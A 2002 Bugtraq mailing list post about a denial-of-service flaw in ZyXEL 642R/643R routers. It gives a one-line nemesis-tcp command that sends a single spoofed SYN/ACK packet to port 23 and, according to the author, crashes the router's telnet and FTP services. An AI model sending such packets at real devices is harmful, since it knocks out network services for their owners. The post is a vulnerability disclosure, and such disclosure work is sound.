Bugtraq mailing list archives

Re: ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS -- 643R testing


From: Kistler Ueli <iuk () gmx ch>
Date: Mon, 17 Jun 2002 19:47:27 +0200

 Hello

there's no need to flood the router.. just send 1 single packet and it
crashs the remote service (works on telnet and FTP, dhcp not tested... ).
Example with nemesis:
nemesis-tcp -v -S %spoofed IP possible% -D %ZyXEL router% -fS -fA -y 23
This will send a packet with SYN/ACK flags set to port 23 (Telnet) to
the router (-v allows a stdout visual of current injected packet)

Regards,
  Ueli Kistler
  www.eclipse.fr.fm / iuk () gmx ch
  www.packx.net / www.eclipse.fr.fm


Current thread: